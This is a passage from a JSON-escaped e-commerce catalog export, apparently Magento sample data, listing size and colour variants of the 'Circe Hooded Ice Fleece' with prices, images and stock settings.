wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1154\":{\"sku\":\"WH12-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-M-Gray\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"1155\":{\"sku\":\"WH12-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-M-Green\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1156\":{\"sku\":\"WH12-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-M-Purple\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1157\":{\"sku\":\"WH12-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-L-Gray\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"1158\":{\"sku\":\"WH12-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-L-Green\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1159\":{\"sku\":\"WH12-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-L-Purple\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1160\":{\"sku\":\"WH12-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-XL-Gray\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"1161\":{\"sku\":\"WH12-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-XL-Green\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"